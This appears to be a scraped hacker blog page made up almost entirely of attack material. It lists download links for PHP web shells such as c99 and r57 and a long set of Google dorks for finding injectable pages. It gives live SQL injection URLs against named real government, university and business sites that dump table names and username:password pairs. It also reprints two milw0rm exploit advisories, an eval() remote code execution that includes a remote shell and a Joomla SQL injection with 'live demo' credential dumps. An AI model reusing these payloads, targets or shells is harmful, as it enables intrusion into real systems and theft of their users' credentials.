Xr0b0t Website

http://localshell.net/c99.txt
http://localshell.net/r57.txt
http://localshell.net/c100.txt
http://localshell.net/safe0ver.txt
http://localshell.net/sosyete.txt
http://localshell.net/erne.txt
http://localshell.net/liz0zim.txt
http://localshell.net/stresbypass.txt
http://localshell.net/kacak.txt
http://localshell.net/ekin0x.txt
http://localshell.net/heykir.txt
http://localshell.net/spybypass.txt
http://localshell.net/zehir4.txt
http://localshell.net/simattacker.txt
http://localshell.net/mysql.txt
http://localshell.net/remview.txt
http://localshell.net/ajax.txt
http://localshell.net/antichat.txt
http://localshell.net/aspx.txt
http://localshell.net/worse.txt
http://localshell.net/dive.txt
http://localshell.net/fso.txt
http://securitywall.org/locus.txt
http://securitywall.org/2009.txt
http://securitywall.org/priv2.txt
http://securitywall.org/cgi-telnet.txt
http://securitywall.org/r57.txt
http://securitywall.org/c99.txt

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

http://www.kpujatim.go.id/news.php?id=116+order+by+15--
http://www.pelangi.or.id/news.php?hid=66+order+by+1--
http://www.organicindonesia.org/05infodata-news.php?id=139
http://www.d-infokom-jatim.go.id/news.php?id=685
http://kenduricinta.com/news.php?id=114
http://www.dprd-sidoarjo.info/news.php?id=197
http://www.dprd-sidoarjo.info/news.php?id=-197+order+by+1--
http://www.jcautosales.biz/jcauto/

http://www.purwakarta.go.id/bupati.php?temp&limit=410%27+order+by+1--
http://www.smk4-padang.sch.id/mod.php?mod=katalog&op=viewlink&cid=23%27+order+by+4--

http://www.eco1.upm.edu.my/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password)%20)%20),3%20from%20jos_users



http://www.arsip.banten.go.id/index.php?link=dtl&id=-4%20union%20select%201,2,3,4,concat(user(),char(58),version(),char(58),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

http://www.mui.or.id/mui_in/news.php?id=null+union+all+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=database()--

http://www.nganjukkab.go.id/ina/ttg.php?id=-12%20union%20select%201,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()--
http://www.simalungunkab.go.id/en/?id=-1+union+select+1,2,3,4,group_concat(table_name),6+from+information_schema.tables--

http://www.pangkalpinang.go.id/news_detail.php?news_code=-1+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()/*

http://www.kkppi.go.id/baru/publikasi.php?mode=baca&pub_id=-5%20union%20all%20select%201,2,3,4,group_concat(table_name),6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--

http://www.trisakti.ac.id/fh/?page=guru_besar&ID=-4+AND+1=2+UNION+SELECT+0,1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()--

http://elink.dinkespurworejo.go.id/mod.php?mod=publisher&op=viewarticle&artid=-7%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--

http://www.pantau.or.id/detailtraining.php?id=-23+union+select+1,2,3,4,table_name,6,7,8,9,10,11%20from%20information_schema.tables--

http://gerbang.jabar.go.id/kabbandung/index.php?index=16&idberita=-99999%20union%20select%201,unhex(hex(concat(char(58),0x3a,password))),3,4,5,6,7,8,9,10,11,12,13,14%20from%20member/*


tr

http://www.sosyalsorumluluk.org.tr/haberler.asp?ID=1%20union+select+0,username,2,3,4,5,password,7,8+from+admin

my

http://cmslib.uum.edu.my/psb/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password)%20)%20),3%20from%20jos_users

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################

[+] Remote PHP Code Execution

 - Vulnerable code in  system/services/init.php :

---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------

- PoC :

   http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]

- Example :

  http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";

- Example 2 :

 http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();

#################################################################################################################

# milw0rm.com [2009-06-03]

==================================================================================
Joomla Component com_mosres (property_uid) SQL injection Vulnerability
==================================================================================



###################################################
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)
[+] Email : chipdebios[alt+64]gmail.com

###################################################

Conditions : magic_quotes_gpc = Off
---------------------------------------------------
Example Joomla:
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code]

[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

Live Demo:
http://ahtopolbg.com/index.php?option=com_mosres&catID=1004&regID=2&task=viewproperty&property_uid=null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

---------------------------------------------------
Example Mambo:
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code]

[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*

Live Demo:
http://www.velingradbg.com/index.php?option=com_mosres&task=viewproperty&property_uid=1005%27%20and%201=2%20union%20select%201,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*

**************************
however, still looking ... component, can be injected in several places (not all or always).
Almost always SQL injection & also blind sql injection.
I let you work ;)

http://www.ahtopolbg.com/index.php?option=com_mosres&task=showregion&regID=4%27+and+1=2+union%20select%201,concat(username,0x3a,password)+from+jos_users/*&lang=bg

**************************


+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++




Mos Res
23/02/2005
Vince Wooll
This component is released under the GNU/GPL License
mosres@woollyinwales.co.uk
http://www.mosres.net
1.0f
Mambo Resident component for v4.5.2

# milw0rm.com [2009-06-03]

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.